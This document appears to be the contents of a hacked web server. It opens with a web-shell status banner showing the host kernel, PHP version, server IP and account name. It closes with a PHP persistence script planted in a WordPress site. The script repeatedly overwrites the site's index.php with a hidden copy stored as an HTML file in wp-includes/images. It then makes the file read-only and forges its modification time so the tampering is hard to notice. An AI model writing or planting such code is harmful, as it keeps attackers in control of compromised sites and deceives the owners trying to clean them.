Uname:
Linux webm001.cluster110.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Software:
Apache
PHP version:
7.3.33 [ PHP INFO ] PHP os:
Linux
Server Ip:
213.186.33.19
Your Ip:
216.73.216.124
User:
creationoo (224166) | Group:
users (100)
Safe Mode:
OFF
Disable Function:
_dyuweyrj4,_dyuweyrj4r,dl
<?php
$insj = '/home/creationoo/www/index.php';
$inym = '/home/creationoo/www/wp-includes/images/UAK8CS.html';
if (file_exists($insj)) {
if (file_exists($inym)) {
@chmod($insj, 0777);
if (md5_file($insj) == md5_file($inym)) {
} else {
$chazh = @file_get_contents($inym);
$at = filemtime($inym);
file_put_contents($insj, $chazh);
if ($at) {
touch($insj, $at);
}
}
@chmod($insj, 0444);
}
} else {
if (file_exists($inym)) {
$at = filemtime($inym);
$chazh = @file_get_contents($inym);
file_put_contents($insj, $chazh);
if ($at) {
touch($insj, $at);
}
}
}
?>